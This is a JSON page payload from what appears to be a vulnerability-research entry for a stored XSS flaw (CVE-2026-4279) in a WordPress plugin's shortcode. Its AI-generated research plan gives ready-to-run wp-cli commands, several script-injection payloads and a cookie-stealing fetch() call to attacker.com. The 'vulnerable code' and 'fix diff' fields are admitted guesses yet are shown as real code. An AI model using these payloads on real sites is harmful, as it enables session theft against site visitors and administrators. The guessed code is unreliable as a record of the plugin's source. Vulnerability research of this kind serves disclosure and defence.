[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVyrF0DnUQd8hjA0slbHwq5Y7XUXOnZDUzn9n1LQFP9w":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4279","bread-butter-content-gating-for-verified-leads-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attri","Bread & Butter: Content Gating for Verified Leads \u003C= 8.2.0.25 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Bread & Butter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'breadbutter-customevent-button' shortcode in all versions up to, and including, 8.2.0.25. This is due to insufficient input sanitization and output escaping on the 'event' shortcode attribute. The customEventShortCodeButton() function takes the 'event' attribute value and directly interpolates it into a JavaScript string within an onclick HTML attribute without applying esc_attr() or esc_js(). Notably, the sister function customEventShortCode() properly uses esc_js() for the same attribute, but this was omitted in the button variant. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the page and clicks the injected button.","bread-butter",null,"\u003C=8.2.0.25","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-21 19:07:06","2026-04-25 15:59:53",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0728b42b-5ec7-46a2-a9a5-3316107e9324?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-4279\n\n## 1. Vulnerability Summary\nThe **Bread & Butter: AI-Powered Lead Intelligence** plugin (\u003C= 8.2.0.25) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `[breadbutter-customevent-button]` shortcode. The vulnerability exists because the function `customEventShortCodeButton()` (inferred) fails to sanitize or escape the `event` attribute before interpolating it into a JavaScript string within an HTML `onclick` attribute. While a similar function `customEventShortCode()` correctly applies `esc_js()`, the button variant does not, allowing a Contributor-level user to inject arbitrary JavaScript.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Post\u002FPage Editor (standard `wp-admin\u002Fpost-new.php` or `post.php`).\n*   **Shortcode:** `[breadbutter-customevent-button]`\n*   **Vulnerable Parameter:** The `event` attribute within the shortcode.\n*   **Authentication Level:** Contributor or higher (any user who can create\u002Fedit posts and use shortcodes).\n*   **Preconditions:** The plugin must be active. The attacker must have the capability to save posts containing shortcodes.\n\n## 3. Code Flow\n1.  **Shortcode Registration:** The plugin registers the shortcode `breadbutter-customevent-button` via `add_shortcode()`.\n2.  **Callback Execution:** When a page containing the shortcode is rendered, WordPress calls the handler function (identified as `customEventShortCodeButton()`).\n3.  **Attribute Processing:** The function uses `shortcode_atts()` to extract the `event` attribute.\n4.  **Vulnerable Sink:** The code constructs an HTML string, likely similar to:\n    ```php\n    $event = $atts['event'];\n    $output = '\u003Cbutton onclick=\"BreadButter.trackCustomEvent(\\'' . $event . '\\')\">Click\u003C\u002Fbutton>';\n    return $output;\n    ```\n5.  **Lack of Escaping:** Because `$event` is neither passed through `esc_js()` (to handle the JS string context) nor `esc_attr()` (to handle the HTML attribute context), an attacker can break out of the JS string and inject arbitrary commands.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is triggered during the **rendering** of a post. No specific plugin-level nonce is required to *trigger* the XSS. However, to *inject* the payload, the attacker needs to create a post.\n\n**For Post Creation (Contributor):**\nThe agent should use `wp-cli` to create the post directly, which bypasses the need for manual nonce extraction and UI interaction.\n*   Command: `wp post create --post_type=post --post_status=publish --post_author=[CONTRIBUTOR_ID] --post_title='XSS Test' --post_content='[breadbutter-customevent-button event=\"PAYLOAD\"]'`\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate that a Contributor can execute JavaScript in the context of an Administrator.\n\n### Step-by-Step Plan:\n1.  **Setup Contributor User:** Ensure a user with the `contributor` role exists.\n2.  **Inject Payload:** Use `wp-cli` as the contributor to create a post containing the malicious shortcode.\n    *   **Payload logic:** We need to close the `trackCustomEvent('` string, execute our code, and comment out the rest.\n    *   **Payload string:** `event=\"x');alert(document.domain);\u002F\u002F\"`\n    *   **Resulting HTML (inferred):** `\u003Cbutton onclick=\"BreadButter.trackCustomEvent('x');alert(document.domain);\u002F\u002F')\">...\u003C\u002Fbutton>`\n3.  **Victim Interaction:** Navigate to the created post as an Administrator using `browser_navigate`.\n4.  **Trigger XSS:** Click the button generated by the shortcode.\n\n### HTTP Request Details (Simulating viewing the page):\n*   **Method:** `GET`\n*   **URL:** `http:\u002F\u002F[TARGET]\u002Findex.php?p=[POST_ID]`\n*   **Tools:** `browser_navigate` followed by `browser_click`.\n\n## 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `bread-butter` plugin is installed and active.\n2.  **Contributor User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n3.  **Malicious Post:**\n    ```bash\n    wp post create --post_type=post --post_title=\"Lead Intelligence\" --post_content='[breadbutter-customevent-button event=\"x\\');alert(document.domain);\u002F\u002F\" button_text=\"Click for Details\"]' --post_status=publish --post_author=$(wp user get attacker --field=ID)\n    ```\n\n## 7. Expected Results\n*   When the Administrator (or any user) views the post, a button labeled \"Click for Details\" will appear.\n*   Upon clicking the button, the browser will execute the injected `alert(document.domain)` script.\n*   The execution proves that the `event` attribute is reflected without proper `esc_js()` or `esc_attr()` sanitization.\n\n## 8. Verification Steps\n1.  **Source Code Inspection:**\n    Use `http_request` to fetch the post content and check the HTML structure:\n    ```bash\n    # Search for the button and its onclick attribute\n    # Expected find: onclick=\"BreadButter.trackCustomEvent('x');alert(document.domain);\u002F\u002F')\"\n    ```\n2.  **Verify via CLI:**\n    Ensure the post was created correctly by the contributor:\n    ```bash\n    wp post get [POST_ID] --field=post_content\n    ```\n\n## 9. Alternative Approaches\nIf a simple `alert()` payload is blocked by basic filters or if the `onclick` attribute is wrapped differently:\n\n*   **Attribute Breakout:** If the code is `$event . '\")'`. Try:\n    `event=\"x\" onmouseover=\"alert(1)\" data-ignore=\"`\n*   **Double Quote Context:** If the PHP uses double quotes:\n    `event=\"x\\\");alert(1);\u002F\u002F\"`\n*   **Global Variable Check:** If we want to demonstrate impact without clicking, we could try to inject a payload into another attribute if multiple are rendered, but the `onclick` on the button is the most direct sink.\n*   **Payload without Alert:** To be more \"stealthy\" in a real scenario, use:\n    `event=\"x');fetch('http:\u002F\u002Fattacker.com\u002F?c='+document.cookie);\u002F\u002F\"` (Note: Cookies may be HttpOnly, so document.domain is a better PoC).","The Bread & Butter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'breadbutter-customevent-button' shortcode. A flaw in the customEventShortCodeButton() function allows authenticated attackers (Contributor level and above) to inject arbitrary JavaScript into the 'event' attribute, which is then reflected unescaped into an 'onclick' HTML attribute.","\u002F\u002F Inferred from plugin structure and vulnerability description\n\u002F\u002F Path: bread-butter\u002Fincludes\u002Fshortcodes.php (exact file path may vary)\n\nfunction customEventShortCodeButton($atts) {\n    $a = shortcode_atts(array(\n        'event' => '',\n        'button_text' => 'Click'\n    ), $atts);\n\n    $event = $a['event'];\n    $button_text = $a['button_text'];\n\n    \u002F\u002F The 'event' variable is interpolated directly into the onclick attribute without esc_js() or esc_attr()\n    return '\u003Cbutton onclick=\"BreadButter.trackCustomEvent(\\'' . $event . '\\')\">' . esc_html($button_text) . '\u003C\u002Fbutton>';\n}","--- a\u002Fbread-butter\u002Fincludes\u002Fshortcodes.php\n+++ b\u002Fbread-butter\u002Fincludes\u002Fshortcodes.php\n@@ -10,5 +10,5 @@\n     $event = $a['event'];\n     $button_text = $a['button_text'];\n \n-    return '\u003Cbutton onclick=\"BreadButter.trackCustomEvent(\\'' . $event . '\\')\">' . esc_html($button_text) . '\u003C\u002Fbutton>';\n+    return '\u003Cbutton onclick=\"BreadButter.trackCustomEvent(\\'' . esc_js($event) . '\\')\">' . esc_html($button_text) . '\u003C\u002Fbutton>';\n }","The exploit targets the `[breadbutter-customevent-button]` shortcode available to users with at least Contributor-level permissions. An attacker creates or edits a WordPress post and inserts the malicious shortcode: `[breadbutter-customevent-button event=\"x');alert(document.domain);\u002F\u002F\" button_text=\"Click for Details\"]`. When the post is saved and later viewed by any user (including an Administrator), the plugin renders a button with an `onclick` attribute containing the payload. Upon clicking the button, the browser executes the injected JavaScript because the single quote closes the original JS string, and the semi-colon allows for the execution of the `alert()` command.","gemini-3-flash-preview","2026-04-27 13:58:46","2026-04-27 13:59:04",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbread-butter\u002Ftags"]